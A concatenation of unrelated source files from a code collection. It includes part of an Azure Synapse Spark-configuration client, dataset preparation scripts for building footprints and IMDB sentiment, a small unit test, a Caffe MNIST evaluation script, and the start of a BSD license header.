cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._delete_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _rename_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
_request = _models.ArtifactRenameRequest(new_name=new_name)
_json = self._serialize.body(_request, "ArtifactRenameRequest")
request = build_rename_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._rename_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_rename_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
@distributed_trace
def begin_rename_spark_configuration(
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> LROPoller[None]:
"""Renames a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param new_name: New name of the artifact. Default value is None.
:type new_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._rename_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
new_name=new_name,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_rename_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
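# Illustrative usage (not part of the generated client code): a minimal sketch of
# driving the Spark-configuration operations defined above. `ops` is assumed to be
# this operation group as exposed on an authenticated ArtifactsClient (for example
# client.spark_configuration); the attribute name, keyword arguments and the sample
# configuration values are assumptions for illustration only.
def _example_spark_configuration_roundtrip(ops, name="sample-spark-config"):
    from azure.synapse.artifacts import models as example_models
    # Create or update the configuration and block until the long-running operation finishes.
    properties = example_models.SparkConfiguration(configs={"spark.executor.cores": "2"})
    created = ops.begin_create_or_update_spark_configuration(name, properties).result()
    # Read the configuration back and enumerate everything in the workspace (ItemPaged is iterable).
    fetched = ops.get_spark_configuration(name)
    names = [item.name for item in ops.get_spark_configurations_by_workspace()]
    # Clean up with the delete poller.
    ops.begin_delete_spark_configuration(name).result()
    return created, fetched, names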
|
[
"noreply@github.com"
] |
fangchen0601.noreply@github.com
|
ecf5f0f62c51ab6359317746fd5f24df8967cb26
|
d268ee5da12d4eecc7bf97f37ec71ae58fe5854d
|
/data_set_prep/dataset_prep_scr.py
|
0cc7adb12c263a0b1b7b24868476e42d26b4213b
|
[] |
no_license
|
oiynick/rcnn_buildings
|
b5760727fc0063086362eaffe32e36e2fafc75e7
|
1be3d554e5e3a0bc13ed086c73f3a87f61e025d5
|
refs/heads/master
| 2020-04-28T08:57:19.537442
| 2019-03-21T12:54:29
| 2019-03-21T12:54:29
| 175,148,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,222
|
py
|
import numpy as np
import shapely.geometry
from aeronet import dataset as ds
def one_sample(fp_json, fp_tif):
# Read the JSON file and the TIF image
av_features = ds.vector.FeatureCollection.read(fp_json)
raster = ds.raster.Band(fp_tif)
# Image sizing info and setting up the coordinates
samples = raster.generate_samples(512, 512)
for i in samples:
# Taking bounds of the generated sample
bounds = i.bounds
        # Create the sample footprint as a rectangle; box(minx, miny, maxx, maxy)
        # assumes min_point/max_point are (x, y) tuples of the sample bounds
        area = shapely.geometry.box(*(bounds.min_point + bounds.max_point))
# Create a feature based on a shape
a_feature = ds.vector.Feature(area)
# Find the intersecting features
inter = av_features.intersection(a_feature)
# For every feature make a feature collection and raster data
for feature in inter:
offc = ds.vector.FeatureCollection(feature)
rasta = ds.transforms.rasterize(offc, i.transform, (512, 512))
yield rasta
def main():
    amount = 1
    results = []
    for i in range(amount):
        fp_tif = '{}.tif'.format(i)
        fp_json = '{}.json'.format(i)
        # one_sample is a generator, so materialise the rasterised masks for each image pair
        results.append(list(one_sample(fp_json, fp_tif)))
    return results
if __name__ == '__main__':
    main()
|
[
"nikita.veliev@skoltech.ru"
] |
nikita.veliev@skoltech.ru
|
75d75f75c5dfebdcd52ba31013c836708232536a
|
6e68d7f4bbd2cf2ecad7cdf6bbd07d6687f2685c
|
/preprocessing.py
|
a406884f0db4f90c620feac07d8ce7282e1b221b
|
[] |
no_license
|
AbhinavJindl/sentiment_analysis
|
bd5a08345913d92cd5be0e61fe5095e196fb9d49
|
b2154a89f3c0bfa89318e8d280734ed25af1cc5f
|
refs/heads/master
| 2020-03-27T20:41:28.945916
| 2018-09-02T13:55:07
| 2018-09-02T13:55:07
| 147,086,857
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,108
|
py
|
import random
import pickle
no_words = 5000
no_reviews = 1000
no_validation=1000
no_test=1000
forest_trees=50
forest_tree_features=2000
def add_noice(review_list_pos, review_list_neg, p):
    # select p percent of the combined positive/negative reviews as label-noise candidates
    review_list = review_list_pos + review_list_neg
    n = int((p / 100) * len(review_list) / 2)
    return random.sample(review_list, n)
def load(filename):
file = open(filename,'rb')
obj=pickle.load(file)
file.close()
return obj
def save(obj,filename):
file=open(filename,'wb')
pickle.dump(obj,file)
file.close()
#returns a dictionary for a review given string
def list_review(s,indexlist):
dic = {}
tokens=s.split(" ")
dic['sentiment']=int(tokens[0])
dic['list']=[]
for i in range(1,len(tokens)):
t=tokens[i].split(":")
if int(t[0]) in indexlist:
dic['list'].append(int(t[0]))
return dic
def preprocess():
wordsfile = open('aclImdb_v1/aclImdb/imdb.vocab','r',encoding='utf-8')
valuefile = open('aclImdb_v1/aclImdb/imdbEr.txt','r',encoding='utf-8')
count=0
words_i=[]
for line in valuefile:
linetoken=line.split('\n')
current=(count, float(linetoken[0]))
words_i.append(current)
count=count+1
words_i= sorted(words_i,key=lambda x: x[1])
indexlist=[]
for i in range(int(no_words/2)):
indexlist.append(words_i[i][0])
indexlist.append(words_i[-i][0])
indexlist= sorted(indexlist)
forest_index_lists=[]
for i in range(forest_trees):
forest_index_lists.append(random.sample(indexlist,forest_tree_features))
reviewsfile = open('aclImdb_v1/aclImdb/train/labeledBow.feat','r',encoding='utf-8')
full_review_list = reviewsfile.readlines();
random_list_pos = random.sample(range(0,int(len(full_review_list)/2)),int(no_reviews/2))
random_list_neg = random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_reviews/2))
review_list={}
for i in random_list_pos:
review_list[i]=list_review(full_review_list[i],indexlist)
for i in random_list_neg:
review_list[i]=list_review(full_review_list[i],indexlist)
testfile = open('aclImdb_v1/aclImdb/test/labeledBow.feat','r',encoding='utf-8')
test_review_list=testfile.readlines()
validation_list_pos=random.sample(range(0,int(len(full_review_list)/2)),int(no_validation/2))
validation_list_neg= random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_validation/2))
validation_list = validation_list_pos+validation_list_neg
validation_reviews={}
for i in validation_list:
validation_reviews[i]=list_review(full_review_list[i],indexlist)
test_list_pos=random.sample(range(0,int(len(test_review_list)/2)),int(no_test/2))
test_list_neg= random.sample(range(int(len(test_review_list)/2),len(test_review_list)),int(no_test/2))
test_list=test_list_neg+test_list_pos
test_reviews={}
for i in test_list:
test_reviews[i]=list_review(test_review_list[i],indexlist)
save(validation_reviews,'validationreviews.pkl')
save(validation_list,'validationlist.pkl')
save(test_reviews,'testreviews.pkl')
save(test_list,'testlist.pkl')
save(random_list_pos,'randompos.pkl')
save(random_list_neg,'randomneg.pkl')
save(review_list,'reviewlist.pkl')
save(indexlist,'indexlist.pkl')
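# Illustrative follow-up (not part of the original script): a minimal sketch that reads
# back two of the pickles written by preprocess() using the load() helper above. The
# printed fields follow the dictionaries built in list_review(); nothing else is assumed.
def inspect_saved_data():
    review_list = load('reviewlist.pkl')
    index_list = load('indexlist.pkl')
    print('sampled training reviews:', len(review_list))
    print('vocabulary indices kept:', len(index_list))
    # each review dict holds a star rating under 'sentiment' and its word indices under 'list'
    first_review = next(iter(review_list.values()))
    print('first review sentiment:', first_review['sentiment'], 'words kept:', len(first_review['list']))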
if __name__=="__main__":
preprocess()
|
[
"2016csb1026@iitrpr.ac.in"
] |
2016csb1026@iitrpr.ac.in
|
f5dff936815d2f26b852c4ae10f5bf7d9e9004b8
|
ed569623f4686688edac40c2dabde0206546316b
|
/tests/unit/models/company_test.py
|
00eea0a1fdd38459098b429e193dbf491738925e
|
[] |
no_license
|
leobene/RadarMiles
|
34753114854f9dff7ee781060c2f99ec3a54d468
|
9810b04f29ba5a514dfcbfb0679f304f93842d37
|
refs/heads/master
| 2020-04-08T09:13:02.806563
| 2018-12-03T23:46:58
| 2018-12-03T23:46:58
| 159,213,641
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 711
|
py
|
from models.company import CompanyModel
from tests.base_test import BaseTest
class CompanyTest(BaseTest):
    def test_create_company(self):
company = CompanyModel('GOL')
self.assertEqual(company.name, 'GOL',
"The name of the company after creation does not equal the constructor argument.")
    def test_company_json(self):
company = CompanyModel('GOL')
expected = {
'id': company.id,
'name': company.name,
}
self.assertEqual(
company.json(),
expected,
"The JSON export of the company is incorrect. Received {}, expected {}.".format(company.json(), expected))
|
[
"leobene@192.168.0.100"
] |
leobene@192.168.0.100
|
7a01f23b1d83f8f97510a946715871ec8f1d5700
|
6d63fb09abb41f2c3f6ba66091b8c0507044104d
|
/py/liu.py
|
3d41ef1913f6c48a13f1ebb8c86ac5ac6a627c48
|
[] |
no_license
|
buaaswf/backup-my-projects
|
dbc3d0c4ac5af38b4b8ce07be7978e3ff36cf75c
|
73577385da85fdd5899cb471220dd8334ca603bc
|
refs/heads/master
| 2021-04-15T03:44:06.248881
| 2018-03-22T08:58:36
| 2018-03-22T08:58:36
| 126,304,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,242
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import numpy as np
import sys
from sklearn.metrics import classification_report
sys.path.insert(0,"/home/s.li/2017/gpu4/caffe-segnet-cudnn5/python")
import matplotlib.pyplot as plt
import caffe
import os
import scipy.io
import shutil
from mnist_single_plot_roc import drawroc
# Make sure that caffe is on the python path:
from sklearn.metrics import confusion_matrix
from tsne.tsne_1 import tsnepng
def vis_square(resname, data, padsize=1, padval=0):
data -= data.min()
data /= data.max()
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imsave(resname, data)
def GetFileList(dir, fileList):
newDir = dir
if os.path.isfile(dir):
fileList.append(dir.decode('gbk'))
elif os.path.isdir(dir):
for s in os.listdir(dir):
            # If certain folders or files need to be skipped, use the following check
if s.endswith(".txt") or s.endswith(".sh") or s.endswith(".py"):
continue
#if int(s)>998 and int(s) < 1000:
newDir=os.path.join(dir,s)
GetFileList(newDir, fileList)
return fileList
#dir = '/home/s.li/caffe0719/caffe-master/data/face/patch/casia1000/fullpathval.txt'
def labelfile(dir):
lines = []
with open (dir,'r') as f:
lines = [line.strip().split(' ') for line in f ]
#paths = [line[0] for line in lines]
#labels = [line[1] for line in lines]
# print lines
return lines
if len(sys.argv) != 4:
print "Usage: python multifc.py inputimagedir feature.mat labeldir"
# sys.exit()
def loadmodel(caffepath='../',modelpath='models/casiaface/casia.caffemodel',deployroot='models/casiaface/casia_train_deploy.prototxt',meanroot='data/idface/casia_web.npy',shapelist=[64,3,100,100]):
# caffe_root = caffepath # this file is expected to be in {caffe_root}/examples
caffe_root = "/home/s.li/2017/gpu4/caffe-segnet-cudnn5/"# this file is expected to be in {caffe_root}/examples
sys.path.insert(0, caffe_root + 'python')
plt.rcParams['figure.figsize'] = (10, 10)
plt.rcParams['image.interpolation'] = 'nearest'
params = {'legend.fontsize':20}
plt.rcParams.update(params)
# plt.rcParams['image.cmap'] = 'gray'
model =modelpath
if not os.path.isfile(model):
print("Downloading pre-trained CaffeNet model...")
caffe.set_mode_cpu()
net = caffe.Net(deployroot,model,caffe.TEST)
# input preprocessing: 'data' is the name of the input blob == net.inputs[0]
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2, 0, 1))
# transformer.set_mean('data', np.load(caffe_root + meanroot).mean(1).mean(1)) # mean pixel
blob = caffe.proto.caffe_pb2.BlobProto()
data = open( meanroot , 'rb' ).read()
blob.ParseFromString(data)
arr = np.array( caffe.io.blobproto_to_array(blob) )
out = arr[0]
transformer.set_mean('data', out.mean(1).mean(1)) # mean pixel
transformer.set_raw_scale('data', 255) # the reference model operates on images in [0,255] range instead of [0,1]
transformer.set_channel_swap('data', (2, 1, 0)) # the reference model has channels in BGR order instead of RGB
# set net to batch size of 50
net.blobs['data'].reshape(shapelist[0], shapelist[1], shapelist[2], shapelist[3])
return net,transformer
def image2mat(net,transformer,inputimagedir,outdir,labelfilepath,layername):
#inputimagedir = sys.argv[1]
mat = []
# lines = labelfile(labelfilepath)
# print lines
labels = []
pred = []
predroc= []
nn = 0
caffe.set_mode_gpu()
allimages= GetFileList(inputimagedir, [])
testimages =allimages
# from random import shuffle
import random
# print allimages
random.shuffle(testimages)
errorimagelist="./error/mnist_result/"+outdir.split(".")[0]
if not os.path.exists(errorimagelist):
os.makedirs(errorimagelist)
# print testimages
for image in testimages:
# print image,
gtlabel = int(image.split("/")[-2])
# print gtlabel
try:
net.blobs['data'].data[...] = transformer.preprocess('data', caffe.io.load_image(image))
except Exception, e:
print nn
print str(e)
nn += 1
continue
out = net.forward()
# pred.append(str(out['prob'].argmax()))
# print (out['prob'].shape)
# pred.append(out['prob'][1])
# print("image is {}Predicted class is #{}.".format(image,out['prob'].argmax()))
if out['prob'].argmax()!=gtlabel:
print out['prob'].argmax(),gtlabel
shutil.copy(image,errorimagelist+"/"+image.split("/")[-1].split(".")[0]+"_pred_"+str(out['prob'].argmax())+".png")
# caffe.set_mode_gpu()
# caffe.set_device(0)
#net.forward() # call once for allocation
# %timeit net.forward()
# feat = net.blobs[layername].data[1]
feat = net.blobs[net.blobs.keys()[-2]].data[0]
# for layer_name, param in net.params.iteritems():
# print layer_name + '\t' + str(param[0].data.shape), str(param[1].data.shape)
# print net.blobs.keys()
# filters = net.params['conv1'][0].data
# print filters
predroc.append(net.blobs[net.blobs.keys()[-1]].data[0].flatten())
pred.append(np.argmax(net.blobs[net.blobs.keys()[-1]].data[0].flatten()))
# print "===>>",net.blobs[net.blobs.keys()[-1]].data[0].flatten()
# pred.append(out['prob'])
# print out['prob']
# print net.blobs[net.blobs.keys()[-2]].data[0]
#np.savetxt(image+'feature.txt', feat.flat)
#print type(feat.flat)
featline = feat.flatten()
# print featline
#print type(featline)
#featlinet= zip(*(featline))
mat.append(featline)
label=image.split("/")[-2]
# labels.append(str(lines[nn][1]))
labels.append(int(label))
# print "===>>",out['prob'].argmax()
# print "=====>>",lines[nn][1]
if (nn%100==0):
with open("./error/mnist_result/"+outdir,'w') as f:
scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append
nn += 1
# print pred.shape
# tsnepng(mat,labels,"gootsne_"+outdir)
print "tsnepng=========================>>>>"
drawroc(labels,predroc,"./error/mnist_result/"+"zoomroc_10"+outdir.split('.')[0]+".png")
print "roc=========================>>>>"
print (classification_report(labels,pred))
text_file = open("./error/mnist_result/"+outdir.split('.')[0]+".txt", "w")
text_file.write(outdir.split('.')[0]+" model\n")
text_file.write(classification_report(labels,pred))
import pickle
with open("./error/mnist_result/"+outdir.split('.')[0]+"_pred.pkl","wb") as f:
pickle.dump(mat,f)
with open("./error/mnist_result/"+outdir.split('.')[0]+"_true.pkl","wb") as f:
pickle.dump(labels,f)
with open("./error/mnist_result/"+outdir,'w') as f:
scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append
cm=confusion_matrix(pred, labels)
with open("./error/mnist_result/"+outdir.split(".")[0]+".pkl","wb") as f:
pickle.dump(cm,f)
print cm
np.savetxt("./error/mnist_result/"+outdir.split(".")[0]+"mfse"+".csv", cm, delimiter=",")
def batch_extrac_featuretomat():
#alexnet
# alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/"
# alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/"
alexnetpath="/home/s.li/2016/caffe1128/caffe-master/models/"
# googlenetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_googlenet/"
# cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar_cifar10/"
# svhn_cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/svhn/cifar10net/"
# svhn_googlenetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/googlenet/"
# svhn_alexnetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/alexnet/"
# googlenetpath+"bvlc_googlenet_iter_520000.caffemodel",\
# googlenetpath+"oribvlc_googlenet_iter_520000.caffemodel",\
# modelist=[alexnetpath+"oriciafr10caffe_alexnet_train_iter_390000.caffemodel",\
# alexnetpath+"dvnciafr10caffe_alexnet_train_iter_450000.caffemodel",\
# modelist=[alexnetpath + "cifar10gen_caffe_alexnet_train_iter_130000.caffemodel",\
# modelist =[alexnetpath + "cifar10balanced0_caffe_alexnet_train_iter_410000.caffemodel",\
# modelist =[alexnetpath + "7caffe_alexnet_train_iter_30000.caffemodel",\
# modelist =[alexnetpath + "0509dvn/caffe_alexnet_train_iter_120000.caffemodel",\
# modelist =[alexnetpath + "10caffe_alexnet_train_iter_10000.caffemodel",\
modelist =[alexnetpath + "mnist/mnist_data/result1/caffe_alexnet_train_iter_140000.caffemodel",\
alexnetpath + "mnist/mnist_data/result2/caffe_alexnet_train_iter_120000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result3/caffe_alexnet_train_iter_120000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result4/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result5/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result6/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result7/caffe_alexnet_train_iter_50000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result8/caffe_alexnet_train_iter_60000.caffemodel",\
alexnetpath + "mnist/mnist_data/result9/caffe_alexnet_train_iter_110000.caffemodel",\
alexnetpath + "mnist/mnist_data/result10/caffe_alexnet_train_iter_50000.caffemodel",\
alexnetpath + "mnist/mnist_data/result11/caffe_alexnet_train_iter_50000.caffemodel",\
]
datalist=["/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
]
deploylist=[alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
]
# meanlist=[alexnetpath+"patchcifa10_256_mean.binaryproto",
meanlist=[alexnetpath+"mnist/mnist_data/mean/mean1.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean2.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean3.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean4.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean5.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean6.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean7.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean8.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean9.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean10.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean11.binaryproto",
]
shapelists=[[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227]]#
# [32,3,224,224],[32,3,224,224],\
# [64,3,32,32],[64,3,32,32],[64,3,32,32],[64,3,32,32],
# [10,3,227,227],[10,3,227,227],[10,3,224,224],[10,3,224,224]]
labellist=["cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",]
#"cifa10_valdst.csv",]
# "svhn_ori_valdst.csv",]
# labellist=[""]
# outlist=["cifar10_alex_oversmaple.mat","cifar10_alex_ori.mat","cifar10_cifar10_dvn.mat",
# "cifar10_cifar10_ori.mat","cifar10_google_dvn.mat","cifar10_google_ori.mat",
# "svhn_cifar10_dvn.mat","svhn_cifar10_ori.mat","svhn_alex_dvn.mat","svhn_alex_ori.mat",
# "svhn_google_dvn.mat","svhn_google_ori.mat"
# ]
outlist=["alex_mfseoverh1.mat","alex_mfseoverh2.mat",
"alex_mfseoverh5.mat","alex_mfseoverh6.mat",
"alex_mfseoverh7.mat","alex_mfseoverh9.mat",
"alex_mfseoverh10.mat","alex_mfseoverh11.mat",]
#]
layernamelist=["fc8","fc8","fc8","fc8","fc8","fc8","fc8","fc8"]
# "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"]
# layernamelist=["fc8","fc8","loss3/classifier","loss3/classifier","ip1","ip1",
# "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"]
import traceback
# for i in range(len(modelist)-1,len(modelist)):
for i in range(0,len(modelist)):
# for i in range(0,1):
# if i<4 and i>1:
# continue
# for i in range(2,4):
try:
print modelist[i]
net,transformer=loadmodel(modelpath=modelist[i],deployroot=deploylist[i],
meanroot=meanlist[i],shapelist=shapelists[i])
image2mat(net,transformer,datalist[i],outlist[i],labellist[i],layernamelist[i])
except Exception as e:
print e
print traceback.format_exc()
# break
continue
#argv[0] inputimagedir argv[1] labelfile
if __name__=='__main__':
# if len(sys.argv)!=3:
# print "Usage:python{}inputimagedir outdir labelfile".format(sys.argv[0])
batch_extrac_featuretomat()
#net,transformer=loadmodel(sys.argv[0],sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
# net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/cifa10/cifar10_deploy.prototxt",meanroot="data/cifar10-gcn-leveldb-splits/paddedmean.npy",shapelist=[100,3,32,32])
# # net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/scene/deploy.prototxt",shapelist=[50,3,100,100])
# image2mat(net,transformer,sys.argv[1],sys.argv[2],sys.argv[3])#argv[0] inputimagedir argv[1] labelfile
#def loadmodel(cafferoot,modelpath,deployroot,meanroot,shapelist=[64,3,100,100]):
|
[
"noreply@github.com"
] |
buaaswf.noreply@github.com
|
e27d03897ae226bf6eafffa5093cee07b628880d
|
a1dd6f2e13506b54120532c2ed093dc270eff4ac
|
/GridServices/TransactiveControl/TNT_Version1/TNSAgent/tns/transactive_record.py
|
3f466148e9947fe21eff8fd0e8fe6acc846f3d6b
|
[
"BSD-3-Clause"
] |
permissive
|
shwethanidd/volttron-pnnl-applications-2
|
ec8cc01c1ffeff884c091617892fea6e84a3e46e
|
24d50729aef8d91036cc13b0f5c03be76f3237ed
|
refs/heads/main
| 2023-06-18T12:13:13.607951
| 2021-06-30T23:00:01
| 2021-06-30T23:00:01
| 359,586,385
| 0
| 0
|
BSD-3-Clause
| 2021-04-19T20:15:45
| 2021-04-19T20:15:45
| null |
UTF-8
|
Python
| false
| false
| 4,505
|
py
|
"""
Copyright (c) 2020, Battelle Memorial Institute
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of the FreeBSD Project.
